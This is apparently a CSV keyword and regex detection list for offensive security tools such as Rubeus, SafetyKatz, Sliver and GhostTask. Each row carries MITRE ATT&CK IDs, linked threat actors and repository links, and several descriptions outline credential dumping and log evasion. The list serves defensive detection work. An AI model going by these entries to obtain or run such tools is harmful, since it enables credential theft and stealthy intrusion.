"*GhostPack/KeeThief*",".{0,1000}GhostPack\/KeeThief.{0,1000}","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1055 - T1059 - T1070","TA0006 - TA0005 - TA0008","N/A","EvilCorp* - APT20","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","10","10","944","154","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z","46394"
"*GhostPack/Koh*",".{0,1000}GhostPack\/Koh.{0,1000}","offensive_tool_keyword","cobaltstrike","Koh is a C# and Beacon Object File (BOF) toolset that allows for the capture of user credential material via purposeful token/logon session leakage.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/GhostPack/Koh","1","1","N/A","N/A","10","10","492","66","2022-07-13T23:41:38Z","2022-07-07T17:14:09Z","46395"
"*GhostPack/Lockless*",".{0,1000}GhostPack\/Lockless.{0,1000}","offensive_tool_keyword","Lockless","Lockless allows for the copying of locked files.","T1074 - T1020 - T1055","TA0009 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/GhostPack/Lockless","1","1","N/A","N/A","8","3","245","57","2021-04-30T17:51:41Z","2020-03-28T20:57:25Z","46396"
"*GhostPack/Rubeus*",".{0,1000}GhostPack\/Rubeus.{0,1000}","offensive_tool_keyword","Amnesiac","Amnesiac is a post-exploitation framework entirely written in PowerShell and designed to assist with Lateral Movement within Active Directory environments","T1021.002 - T1550.002","TA0008","N/A","Black Basta","Framework","https://github.com/Leo4j/Amnesiac","1","1","N/A","N/A","10","5","415","63","2025-03-18T09:32:04Z","2023-10-31T15:06:25Z","46397"
"*GhostPack/Rubeus*",".{0,1000}GhostPack\/Rubeus.{0,1000}","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1482 - T1558.001 - T1558.002 - T1558.003 - T1558.004","TA0006","N/A","Black Basta - Dispossessor - Conti - Diavol - Ryuk - Wizard Spider - APT29 - COZY BEAR","Credential Access","https://github.com/GhostPack/Rubeus","1","1","N/A","N/A","10","10","4409","804","2025-04-17T10:11:57Z","2018-09-23T23:59:03Z","46398"
"*GhostPack/SafetyKatz*",".{0,1000}GhostPack\/SafetyKatz.{0,1000}","offensive_tool_keyword","SafetyKatz","SafetyKatz is a combination of slightly modified version of @gentilkiwis Mimikatz project and @subtees .NET PE Loader. First. the MiniDumpWriteDump Win32 API call is used to create a minidump of LSASS to C:\Windows\Temp\debug.bin. Then @subtees PELoader is used to load a customized version of Mimikatz that runs sekurlsa::logonpasswords and sekurlsa::ekeys on the minidump file. removing the file after execution is complete","T1003 - T1055 - T1059 - T1574","TA0002 - TA0003 - TA0008","N/A","APT39","Credential Access","https://github.com/GhostPack/SafetyKatz","1","1","N/A","N/A","10","10","1257","247","2019-10-01T16:47:21Z","2018-07-24T17:44:15Z","46399"
"*GhostPack/Seatbelt*",".{0,1000}GhostPack\/Seatbelt.{0,1000}","offensive_tool_keyword","seatbelt","Seatbelt is a comprehensive security scanning tool that can be used to perform a variety of checks. including but not limited to. user privileges. logged in users. network information. system information. and many others","T1012 - T1016 - T1033 - T1046 - T1049 - T1057 - T1069 - T1082 - T1083 - T1098 - T1105 - T1113 - T1135 - T1201 - T1518","TA0001 - TA0002 - TA0003 - TA0004 - TA0007 - TA0011","N/A","Dispossessor","Persistence","https://github.com/GhostPack/Seatbelt","1","1","N/A","N/A","10","10","4047","722","2025-01-10T20:12:49Z","2018-07-24T17:38:51Z","46400"
"*GhostPack/SharpDPAPI*",".{0,1000}GhostPack\/SharpDPAPI.{0,1000}","offensive_tool_keyword","SharpDPAPI","SharpDPAPI is a C# port of some Mimikatz DPAPI functionality.","T1552.002 - T1059.001 - T1112 - T1649","TA0006 - TA0002","N/A","Conti","Credential Access","https://github.com/GhostPack/SharpDPAPI","1","1","N/A","N/A","10","10","1232","215","2024-06-27T13:39:08Z","2018-08-22T17:39:31Z","46401"
"*GhostPack/SharpDump*",".{0,1000}GhostPack\/SharpDump.{0,1000}","offensive_tool_keyword","SharpDump","SharpDump is a C# port of PowerSploit's Out-Minidump.ps1 functionality.","T1003 - T1055 - T1070","TA0006 - TA0005 - TA0008","N/A","Avaddon","Credential Access","https://github.com/GhostPack/SharpDump","1","1","N/A","N/A","10","7","664","130","2019-02-07T02:52:20Z","2018-07-24T17:42:19Z","46402"
"*GhostPack/SharpUp*",".{0,1000}GhostPack\/SharpUp.{0,1000}","offensive_tool_keyword","SharpUp","SharpUp is a C# port of various PowerUp functionality. Currently. only the most common checks have been ported. no weaponization functions have yet been implemented.","T1003 - T1082 - T1057 - T1069 - T1083","TA0004 - TA0007","N/A","N/A","Privilege Escalation","https://github.com/GhostPack/SharpUp","1","1","N/A","N/A","N/A","10","1344","253","2024-02-14T16:38:26Z","2018-07-24T17:39:33Z","46403"
"*Ghostpack-CompiledBinaries*",".{0,1000}Ghostpack\-CompiledBinaries.{0,1000}","offensive_tool_keyword","Ghostpack-CompiledBinaries","Compiled Binaries for Ghostpack","T1140 - T1559.002 - T1547.002 - T1055 - T1036.004","TA0005 - TA0002 - TA0040 - TA0036","N/A","N/A","Exploitation tool","https://github.com/r3motecontrol/Ghostpack-CompiledBinaries","1","1","N/A","N/A","N/A","10","1313","237","2024-10-24T21:58:54Z","2018-07-25T23:38:15Z","46404"
"*ghostsocks-local*",".{0,1000}ghostsocks\-local.{0,1000}","offensive_tool_keyword","ghostsocks","SOCKS5 proxy based on lightsocks","T1090.002 - T1090","TA0005 - TA0008","Lumma Stealer","N/A","Defense Evasion","https://github.com/LemonSaaS/ghostsocks","1","0","N/A","N/A","7","1","2","1","2017-11-14T16:56:05Z","2017-11-13T03:38:57Z","46405"
"*ghostsocks-server*",".{0,1000}ghostsocks\-server.{0,1000}","offensive_tool_keyword","ghostsocks","SOCKS5 proxy based on lightsocks","T1090.002 - T1090","TA0005 - TA0008","Lumma Stealer","N/A","Defense Evasion","https://github.com/LemonSaaS/ghostsocks","1","0","N/A","N/A","7","1","2","1","2017-11-14T16:56:05Z","2017-11-13T03:38:57Z","46406"
"*GhostTask.exe*",".{0,1000}GhostTask\.exe.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor -  making them invisible to all users. - Establishes scheduled tasks directly via the registry -  bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. -  BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","1","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","46407"
"*GhostTask-1.0.zip*",".{0,1000}GhostTask\-1\.0\.zip.{0,1000}","offensive_tool_keyword","GhostTask","Creates scheduled tasks with a restrictive security descriptor -  making them invisible to all users. - Establishes scheduled tasks directly via the registry -  bypassing the generation of standard Windows event logs. - Provides support to modify existing scheduled tasks without generating Windows event logs. - Supports remote scheduled task creation (by using specially crafted Silver Ticket). - Supports to run in C2 with in-memory PE execution module (e.g. -  BruteRatel's memexec)","T1053.005 - T1112 - T1078","TA0003 - TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/netero1010/GhostTask","1","0","N/A","N/A","10","6","549","63","2025-01-02T15:26:01Z","2023-10-23T13:05:00Z","46408"
"*GhostWebShell.cs*",".{0,1000}GhostWebShell\.cs.{0,1000}","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation tool","https://github.com/pwntester/ysoserial.net","1","1","N/A","N/A","10","10","3385","493","2024-12-23T20:59:47Z","2017-09-18T17:48:08Z","46409"
"*gianlucaborello/libprocesshider*",".{0,1000}gianlucaborello\/libprocesshider.{0,1000}","offensive_tool_keyword","libprocesshider","Hide a process under Linux using the ld preloader","T1055 - T1564 - T1620","TA0005 ","N/A","Sandworm","Defense Evasion","https://github.com/gianlucaborello/libprocesshider","1","1","#linux","N/A","9","10","1061","320","2019-08-02T14:28:28Z","2014-08-16T01:09:30Z","46410"
"*GILLES Lionel aka topotam (@topotam77)*",".{0,1000}GILLES\sLionel\saka\stopotam\s\(\@topotam77\).{0,1000}","offensive_tool_keyword","petipotam","PoC tool to coerce Windows hosts to authenticate to other machines via MS-EFSRPC EfsRpcOpenFileRaw or other functions.","T1557.001 - T1021","TA0008","N/A","N/A","Lateral Movement","https://github.com/topotam/PetitPotam","1","0","N/A","N/A","10","10","1944","290","2024-08-15T03:52:26Z","2021-07-18T18:19:54Z","46411"
"*gimmecredz*",".{0,1000}gimmecredz.{0,1000}","offensive_tool_keyword","gimmecredz","This tool can help pentesters to quickly dump all credz from known location. such as .bash_history. config files. wordpress credentials. and so on","T1003 - T1081 - T1552","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/0xmitsurugi/gimmecredz","1","1","N/A","N/A","N/A","2","169","26","2020-01-25T21:56:20Z","2018-09-25T15:46:50Z","46412"
"*ginuerzh/gost*",".{0,1000}ginuerzh\/gost.{0,1000}","offensive_tool_keyword","gost","Ransomware operators actively use Gost capabilities (<https://github.com/ginuerzh/gost>) in order to communicate with their remote server. using the command below. To hide the software in plain sight. they rename it to `System.exe` or `update.exe`.","T1568 - T1001 - T1027 - T1041","TA0002 - TA0011","N/A","Dispossessor - EMBER BEAR","Data Exfiltration","https://github.com/ginuerzh/gost","1","1","N/A","N/A","N/A","10","16646","2539","2024-12-31T13:08:51Z","2015-03-20T09:45:08Z","46414"
"*Gioyik/getExploit*",".{0,1000}Gioyik\/getExploit.{0,1000}","offensive_tool_keyword","getExploit","Python script to explore exploits from exploit-db.com. Exist a similar script in Kali Linux. but in difference this python script will have provide more flexibility at search and download time.","T1587 - T1068 - T1211 - T1210 - T1588","TA0006 - TA0002 - TA0009 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/Gioyik/getExploit","1","1","#linux","N/A","N/A","1","43","27","2015-06-26T16:38:55Z","2015-01-03T03:26:21Z","46415"
"*gist.github.com/byt3bl33d3r/19a48fff8fdc34cc1dd1f1d2807e1b7f*",".{0,1000}gist\.github\.com\/byt3bl33d3r\/19a48fff8fdc34cc1dd1f1d2807e1b7f.{0,1000}","offensive_tool_keyword","Omnispray","Modular Enumeration and Password Spraying Framework","T1110 - T1078.003 - T1087.002 - T1621","TA0001 - TA0002 - TA0006 - TA0007 - TA0009","N/A","N/A","Credential Access","https://github.com/0xZDH/Omnispray","1","1","N/A","N/A","10","2","118","19","2024-04-10T20:05:46Z","2021-02-25T07:28:06Z","46416"
"*git clone * /tmp/cheetah*",".{0,1000}git\sclone\s.{0,1000}\s\/tmp\/cheetah.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","0","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","46417"
"*git diff | ssh pastes.sh changes.patch*",".{0,1000}git\sdiff\s\|\sssh\spastes\.sh\schanges\.patch.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#linux","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","46418"
"*git log -p | scanrepo *",".{0,1000}git\slog\s\-p\s\|\sscanrepo\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","46419"
"*git reset eb88d07c43afe407094e7d609248d85a15e148ef --hard* rm -f sshd*",".{0,1000}git\sreset\seb88d07c43afe407094e7d609248d85a15e148ef\s\-\-hard.{0,1000}\srm\s\-f\ssshd.{0,1000}","offensive_tool_keyword","sshimpanzee","SSHD Based implant supporting tunneling mecanisms to reach the C2 (DNS - ICMP - HTTP Encapsulation - HTTP/Socks Proxies - UDP","T1572 - T1095 - T1090 - T1043","TA0010 - TA0011 - TA0005","N/A","Scattered Spider*","C2","https://github.com/lexfo/sshimpanzee","1","0","N/A","N/A","10","10","263","27","2025-03-05T08:32:56Z","2023-04-03T10:11:27Z","46420"
"*github*/COMHunter/*",".{0,1000}github.{0,1000}\/COMHunter\/.{0,1000}","offensive_tool_keyword","COMHunter","Enumerates COM servers set in LocalServer32 and InProc32 keys on a system using WMI","T1087.002 - T1012 - T1057","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/matterpreter/OffensiveCSharp/tree/master/COMHunter","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","46421"
"*github*/DeathStar*",".{0,1000}github.{0,1000}\/DeathStar.{0,1000}","offensive_tool_keyword","DeathStar","DeathStar is a Python script that uses Empires RESTful API to automate gaining Domain and/or Enterprise Admin rights in Active Directory environments using some of the most common offensive TTPs.","T1078 - T1059 - T1047 - T1018 - T1069","TA0002 - TA0003 - TA0007","N/A","N/A","Exploitation tool","https://github.com/byt3bl33d3r/DeathStar","1","0","N/A","N/A","N/A","10","1607","331","2024-01-23T10:24:34Z","2017-05-21T07:34:57Z","46422"
"*github*/dropper.git*",".{0,1000}github.{0,1000}\/dropper\.git.{0,1000}","offensive_tool_keyword","dropper","Generates Malicious Office Macro Enabled Dropper for DLL SideLoading and Embed it in Lnk file to bypass MOTW","T1059 - T1574.002 - T1218 - T1559.003","TA0002 - TA0005 - TA0009","N/A","N/A","Resource Development","https://github.com/SaadAhla/dropper","1","1","N/A","N/A","10","","N/A","","","","46423"
"*github*/MoveKit.git*",".{0,1000}github.{0,1000}\/MoveKit\.git.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike kit for Lateral Movement","T1021.002 - T1021.006 - T1021.004","TA0008 - TA0002","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","Lateral Movement","https://github.com/0xthirteen/MoveKit","1","1","N/A","N/A","10","7","666","109","2020-02-21T20:23:45Z","2020-01-24T22:19:16Z","46424"
"*github*/Mr-xn/*",".{0,1000}github.{0,1000}\/Mr\-xn\/.{0,1000}","offensive_tool_keyword","spring-core-rce","github user infosec hosting exploitation tools","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/Mr-xn/spring-core-rce","1","1","N/A","N/A","N/A","1","50","18","2022-04-01T15:34:03Z","2022-03-30T14:35:00Z","46425"
"*github*/padre.git*",".{0,1000}github.{0,1000}\/padre\.git.{0,1000}","offensive_tool_keyword","padre","padre?is an advanced exploiter for Padding Oracle attacks against CBC mode encryption","T1203 - T1059.003 - T1027.002","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/glebarez/padre","1","1","N/A","N/A","8","3","253","24","2024-05-13T14:28:25Z","2019-12-30T13:52:03Z","46426"
"*github.com/*Reaper.exe*",".{0,1000}github\.com\/.{0,1000}Reaper\.exe.{0,1000}","offensive_tool_keyword","reaper","Reaper is a proof-of-concept designed to exploit BYOVD (Bring Your Own Vulnerable Driver) driver vulnerability. This malicious technique involves inserting a legitimate - vulnerable driver into a target system - which allows attackers to exploit the driver to perform malicious actions.","T1547.009 - T1215 - T1129 - T1548.002","TA0002 - TA0003 - TA0040 - TA0005","N/A","N/A","Defense Evasion","https://github.com/MrEmpy/Reaper","1","1","N/A","N/A","10","2","158","34","2024-12-07T01:52:58Z","2023-09-21T02:09:48Z","46431"
"*github.com/bishopfox/*",".{0,1000}github\.com\/bishopfox\/.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","46432"
"*github.com/g3tsyst3m*",".{0,1000}github\.com\/g3tsyst3m.{0,1000}","offensive_tool_keyword","elevationstation","github user hosting multiple exploitation tools","T1548.002 - T1055 - T1574.002 - T1078.003","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/g3tsyst3m/elevationstation","1","1","N/A","N/A","N/A","4","368","45","2023-11-02T23:52:51Z","2023-06-10T03:30:59Z","46433"
"*github.com/k8gege*",".{0,1000}github\.com\/k8gege.{0,1000}","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","Ghost Ransomware","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/k8gege/Ladon","1","1","N/A","N/A","10","10","5025","880","2025-03-24T13:53:59Z","2019-11-02T06:22:41Z","46434"
"*github.com/MythicAgents/*",".{0,1000}github\.com\/MythicAgents\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/MythicAgents/Athena","1","1","N/A","N/A","10","10","198","40","2025-02-12T17:13:10Z","2022-01-24T20:44:38Z","46435"
"*github.com/postrequest/link*",".{0,1000}github\.com\/postrequest\/link.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","1","N/A","N/A","10","10","575","90","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z","46436"
"*github.com/rasta-mouse/*",".{0,1000}github\.com\/rasta\-mouse\/.{0,1000}","offensive_tool_keyword","cobaltstrike","TikiTorch was named in homage to CACTUSTORCH by Vincent Yiu. The basic concept of CACTUSTORCH is that it spawns a new process. allocates a region of memory. writes shellcode into that region. and then uses CreateRemoteThread to execute said shellcode. Both the process and shellcode are specified by the user. The primary use case is as a JavaScript/VBScript loader via DotNetToJScript. which can be utilised in a variety of payload types such as HTA and VBA.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/rasta-mouse/TikiTorch","1","1","N/A","N/A","10","10","761","139","2021-10-24T10:29:46Z","2019-02-19T14:49:17Z","46437"
"*github.com/rossja/TinyNuke*",".{0,1000}github\.com\/rossja\/TinyNuke.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","1","N/A","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","46438"
"*github.com/SafeJKA/Kidlogger*",".{0,1000}github\.com\/SafeJKA\/Kidlogger.{0,1000}","offensive_tool_keyword","kiglogger","malware parental control software - keylogger","T1056.001 - T1113 - T1056.004","TA0006 - TA0009","N/A","N/A","Collection","https://kidlogger.net/download.html","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","46439"
"*github.com/SpiderLabs/*",".{0,1000}github\.com\/SpiderLabs\/.{0,1000}","offensive_tool_keyword","cobaltstrike","SharpCompile is an aggressor script for Cobalt Strike which allows you to compile and execute C# in realtime. This is a more slick approach than manually compiling an .NET assembly and loading it into Cobalt Strike. The project aims to make it easier to move away from adhoc PowerShell execution instead creating a temporary assembly and executing ","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/SpiderLabs/SharpCompile","1","1","N/A","N/A","10","10","291","58","2020-08-07T12:49:36Z","2018-11-01T17:18:52Z","46440"
"*github.io/weakpass/generator/*",".{0,1000}github\.io\/weakpass\/generator\/.{0,1000}","offensive_tool_keyword","weakpass","Weakpass collection of tools for bruteforce and hashcracking","T1110 - T1201","TA0006 - TA0002","N/A","Black Basta","Credential Access","https://github.com/zzzteph/weakpass","1","1","N/A","N/A","10","6","541","55","2025-04-08T19:50:48Z","2021-08-29T13:07:37Z","46442"
"*GithubC2-main*",".{0,1000}GithubC2\-main.{0,1000}","offensive_tool_keyword","GithubC2","Github as C2","T1095 - T1071.001","TA0011","N/A","N/A","C2","https://github.com/TheD1rkMtr/GithubC2","1","1","N/A","N/A","10","10","136","37","2023-08-02T02:26:05Z","2023-02-15T00:50:59Z","46443"
"*gitjdm/dumper2020*",".{0,1000}gitjdm\/dumper2020.{0,1000}","offensive_tool_keyword","dumper2020","Create a minidump of the LSASS process - attempts to neutralize all user-land API hooks before dumping LSASS","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/gitjdm/dumper2020","1","1","N/A","N/A","10","1","76","5","2020-12-29T03:55:21Z","2020-10-04T17:25:21Z","46444"
"*gitleaks detect*",".{0,1000}gitleaks\sdetect.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","N/A","7","1","95","10","2025-02-03T12:05:52Z","2021-11-15T13:40:56Z","46446"
"*gitleaks*",".{0,1000}gitleaks.{0,1000}","offensive_tool_keyword","Gitleaks","Gitleaks is a SAST tool for detecting hardcoded secrets like passwords. api keys. and tokens in git repos. Gitleaks aims to be the easy-to-use. all-in-one solution for finding secrets. past or present. in your code.","T1583 - T1059.001 - T1059.003","TA0002 - TA0003 - TA0040","N/A","N/A","Credential Access","https://github.com/zricethezav/gitleaks","1","1","N/A","N/A","N/A","10","19587","1590","2025-04-16T21:10:47Z","2018-01-27T18:19:31Z","46447"
